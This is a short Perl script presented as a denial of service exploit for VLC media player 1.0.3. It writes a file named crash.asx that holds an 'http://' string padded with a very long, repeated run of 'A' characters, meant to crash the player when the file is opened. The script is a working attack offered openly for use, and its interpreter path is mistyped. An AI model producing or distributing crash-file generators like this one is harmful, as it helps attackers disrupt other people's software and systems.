VLC version 1.0.3 denial of service exploit.
213356a319c4db549adb0bf1a20149cad69e850a43384a4fff432e416b38b7a9
#!/user/bin/perl
# Author: [D3V!L FUCKER]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";
my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 500000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "Done..!~#\n";